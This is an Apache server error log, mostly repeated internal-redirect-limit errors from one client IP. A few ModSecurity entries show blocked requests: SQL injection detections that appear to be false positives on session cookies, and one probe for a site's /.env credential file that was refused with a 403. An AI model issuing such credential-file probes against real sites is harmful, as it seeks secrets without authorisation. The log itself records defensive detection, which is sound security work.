[Mon May 11 22:51:14.498236 2026] [core:error] [pid 1588898:tid 1588906] [client 20.63.80.119:64540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:14.498271 2026] [core:error] [pid 1588898:tid 1588906] [client 20.63.80.119:64540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:15.074457 2026] [core:error] [pid 1630927:tid 1630939] [client 20.63.80.119:64535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:15.074489 2026] [core:error] [pid 1630927:tid 1630939] [client 20.63.80.119:64535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:15.639131 2026] [core:error] [pid 1588898:tid 1588912] [client 20.63.80.119:64557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:15.639172 2026] [core:error] [pid 1588898:tid 1588912] [client 20.63.80.119:64557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:16.287065 2026] [core:error] [pid 1606352:tid 1606429] [client 20.63.80.119:64570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:16.287098 2026] [core:error] [pid 1606352:tid 1606429] [client 20.63.80.119:64570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:17.399636 2026] [core:error] [pid 1605480:tid 1605523] [client 20.63.80.119:64528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:17.399688 2026] [core:error] [pid 1605480:tid 1605523] [client 20.63.80.119:64528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:18.599814 2026] [core:error] [pid 1588898:tid 1588911] [client 20.63.80.119:64524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:18.599843 2026] [core:error] [pid 1588898:tid 1588911] [client 20.63.80.119:64524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:19.215710 2026] [core:error] [pid 1605480:tid 1605528] [client 20.63.80.119:64483] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:19.215747 2026] [core:error] [pid 1605480:tid 1605528] [client 20.63.80.119:64483] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:19.866709 2026] [core:error] [pid 1630927:tid 1630950] [client 20.63.80.119:64569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:19.866739 2026] [core:error] [pid 1630927:tid 1630950] [client 20.63.80.119:64569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:21.729312 2026] [core:error] [pid 1590352:tid 1590394] [client 20.63.80.119:64536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:21.729339 2026] [core:error] [pid 1590352:tid 1590394] [client 20.63.80.119:64536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:22.904511 2026] [core:error] [pid 1601130:tid 1601162] [client 20.63.80.119:64572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:22.904548 2026] [core:error] [pid 1601130:tid 1601162] [client 20.63.80.119:64572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:23.297070 2026] [core:error] [pid 1605480:tid 1605541] [client 20.63.80.119:64518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:23.297093 2026] [core:error] [pid 1605480:tid 1605541] [client 20.63.80.119:64518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:23.702910 2026] [core:error] [pid 1588898:tid 1588917] [client 20.63.80.119:64463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:23.702941 2026] [core:error] [pid 1588898:tid 1588917] [client 20.63.80.119:64463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:24.082095 2026] [core:error] [pid 1590352:tid 1590406] [client 20.63.80.119:64471] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:24.082127 2026] [core:error] [pid 1590352:tid 1590406] [client 20.63.80.119:64471] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:24.825693 2026] [core:error] [pid 1605480:tid 1605534] [client 20.63.80.119:64541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:24.825731 2026] [core:error] [pid 1605480:tid 1605534] [client 20.63.80.119:64541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:25.192129 2026] [core:error] [pid 1588898:tid 1588901] [client 20.63.80.119:64469] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:25.192192 2026] [core:error] [pid 1588898:tid 1588901] [client 20.63.80.119:64469] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:26.290510 2026] [core:error] [pid 1630927:tid 1630942] [client 20.63.80.119:64566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:26.290547 2026] [core:error] [pid 1630927:tid 1630942] [client 20.63.80.119:64566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:26.984709 2026] [core:error] [pid 1630927:tid 1630933] [client 20.63.80.119:64525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:26.984739 2026] [core:error] [pid 1630927:tid 1630933] [client 20.63.80.119:64525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:27.366930 2026] [security2:error] [pid 1606352:tid 1606813] [client 114.119.148.14:31603] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cc0d1ab18eb7e181b22b2a95e4d243a2||1778534485||1778534125"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/location-vacances/page/2/"] [unique_id "agJBT3o_DFxNSZVmaX3Y6QAAANg"], referer: https://rentparadise.fr/location-vacances/page/2
[Mon May 11 22:51:27.367183 2026] [security2:error] [pid 1606352:tid 1606813] [client 114.119.148.14:31603] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/location-vacances/page/2/"] [unique_id "agJBT3o_DFxNSZVmaX3Y6QAAANg"], referer: https://rentparadise.fr/location-vacances/page/2
[Mon May 11 22:51:27.401921 2026] [core:error] [pid 1601130:tid 1601164] [client 20.63.80.119:64562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:27.401963 2026] [core:error] [pid 1601130:tid 1601164] [client 20.63.80.119:64562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:27.722685 2026] [core:error] [pid 1630927:tid 1630939] [client 20.63.80.119:64554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:27.722706 2026] [core:error] [pid 1630927:tid 1630939] [client 20.63.80.119:64554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:28.022807 2026] [core:error] [pid 1588898:tid 1590048] [client 20.63.80.119:64474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:28.023026 2026] [core:error] [pid 1588898:tid 1590048] [client 20.63.80.119:64474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:28.567869 2026] [core:error] [pid 1590352:tid 1590392] [client 20.63.80.119:5057] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:28.567895 2026] [core:error] [pid 1590352:tid 1590392] [client 20.63.80.119:5057] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:29.086329 2026] [core:error] [pid 1588898:tid 1588907] [client 20.63.80.119:64458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:29.086367 2026] [core:error] [pid 1588898:tid 1588907] [client 20.63.80.119:64458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:29.641830 2026] [core:error] [pid 1605480:tid 1605522] [client 20.63.80.119:64516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:29.641856 2026] [core:error] [pid 1605480:tid 1605522] [client 20.63.80.119:64516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:30.064125 2026] [core:error] [pid 1590352:tid 1590401] [client 20.63.80.119:64507] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:30.064171 2026] [core:error] [pid 1590352:tid 1590401] [client 20.63.80.119:64507] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:30.633664 2026] [core:error] [pid 1601130:tid 1601160] [client 20.63.80.119:64490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:30.633736 2026] [core:error] [pid 1601130:tid 1601160] [client 20.63.80.119:64490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:31.129262 2026] [core:error] [pid 1630927:tid 1630950] [client 20.63.80.119:64514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:31.129284 2026] [core:error] [pid 1630927:tid 1630950] [client 20.63.80.119:64514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:31.264857 2026] [security2:error] [pid 1606352:tid 1606813] [client 114.119.148.14:31603] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJBT3o_DFxNSZVmaX3Y6QAAANg"], referer: https://rentparadise.fr/location-vacances/page/2
[Mon May 11 22:51:31.532360 2026] [security2:error] [pid 1606352:tid 1606441] [client 45.159.248.189:51857] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: c3b9b5d58b1bb064e413ef7b7a90b208||1778534468||1778534108"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJBU3o_DFxNSZVmaX3Y8QAAANY"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 22:51:31.540552 2026] [security2:error] [pid 1606352:tid 1606441] [client 45.159.248.189:51857] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJBU3o_DFxNSZVmaX3Y8QAAANY"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 22:51:31.545109 2026] [security2:error] [pid 1606352:tid 1606441] [client 45.159.248.189:51857] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJBU3o_DFxNSZVmaX3Y8QAAANY"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 22:51:31.787626 2026] [core:error] [pid 1588898:tid 1588910] [client 20.63.80.119:64529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:31.787654 2026] [core:error] [pid 1588898:tid 1588910] [client 20.63.80.119:64529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:32.087579 2026] [core:error] [pid 1630927:tid 1630952] [client 20.63.80.119:64539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:32.087832 2026] [core:error] [pid 1630927:tid 1630952] [client 20.63.80.119:64539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:32.462879 2026] [core:error] [pid 1606352:tid 1606424] [client 20.63.80.119:5105] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:32.462904 2026] [core:error] [pid 1606352:tid 1606424] [client 20.63.80.119:5105] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:33.176789 2026] [core:error] [pid 1605480:tid 1605527] [client 20.63.80.119:64567] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:33.176818 2026] [core:error] [pid 1605480:tid 1605527] [client 20.63.80.119:64567] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:34.123196 2026] [core:error] [pid 1590352:tid 1590394] [client 20.63.80.119:64485] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:34.123228 2026] [core:error] [pid 1590352:tid 1590394] [client 20.63.80.119:64485] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:35.365945 2026] [core:error] [pid 1606352:tid 1606438] [client 20.63.80.119:64521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:35.365988 2026] [core:error] [pid 1606352:tid 1606438] [client 20.63.80.119:64521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:36.182058 2026] [core:error] [pid 1630927:tid 1630946] [client 20.63.80.119:64486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:36.182088 2026] [core:error] [pid 1630927:tid 1630946] [client 20.63.80.119:64486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:36.841276 2026] [core:error] [pid 1588898:tid 1588914] [client 20.63.80.119:64549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:36.841308 2026] [core:error] [pid 1588898:tid 1588914] [client 20.63.80.119:64549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:37.196626 2026] [core:error] [pid 1590352:tid 1590406] [client 20.63.80.119:64470] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:37.196658 2026] [core:error] [pid 1590352:tid 1590406] [client 20.63.80.119:64470] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:37.989639 2026] [core:error] [pid 1601130:tid 1601157] [client 20.63.80.119:64496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:37.989663 2026] [core:error] [pid 1601130:tid 1601157] [client 20.63.80.119:64496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:38.589121 2026] [core:error] [pid 1605480:tid 1605530] [client 20.63.80.119:64456] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:38.589168 2026] [core:error] [pid 1605480:tid 1605530] [client 20.63.80.119:64456] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:39.336088 2026] [core:error] [pid 1590352:tid 1590411] [client 20.63.80.119:64460] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:39.336124 2026] [core:error] [pid 1590352:tid 1590411] [client 20.63.80.119:64460] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:40.223496 2026] [core:error] [pid 1605480:tid 1605546] [client 20.63.80.119:64544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:40.223531 2026] [core:error] [pid 1605480:tid 1605546] [client 20.63.80.119:64544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:40.367032 2026] [security2:error] [pid 1630927:tid 1630942] [client 209.50.160.167:52617] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agJBXGiGYYhUwDaJINmVIgAAAUw"]
[Mon May 11 22:51:40.367271 2026] [security2:error] [pid 1630927:tid 1630942] [client 209.50.160.167:52617] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agJBXGiGYYhUwDaJINmVIgAAAUw"]
[Mon May 11 22:51:40.929549 2026] [core:error] [pid 1601130:tid 1601166] [client 20.63.80.119:64555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:40.929583 2026] [core:error] [pid 1601130:tid 1601166] [client 20.63.80.119:64555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:41.819140 2026] [security2:error] [pid 1630927:tid 1630942] [client 209.50.160.167:52617] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJBXGiGYYhUwDaJINmVIgAAAUw"]
[Mon May 11 22:51:41.862186 2026] [core:error] [pid 1601130:tid 1601173] [client 20.63.80.119:64448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:41.862219 2026] [core:error] [pid 1601130:tid 1601173] [client 20.63.80.119:64448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:42.772473 2026] [core:error] [pid 1588898:tid 1588909] [client 20.63.80.119:64563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:42.772630 2026] [core:error] [pid 1588898:tid 1588909] [client 20.63.80.119:64563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:43.270295 2026] [core:error] [pid 1590352:tid 1590409] [client 20.63.80.119:64573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
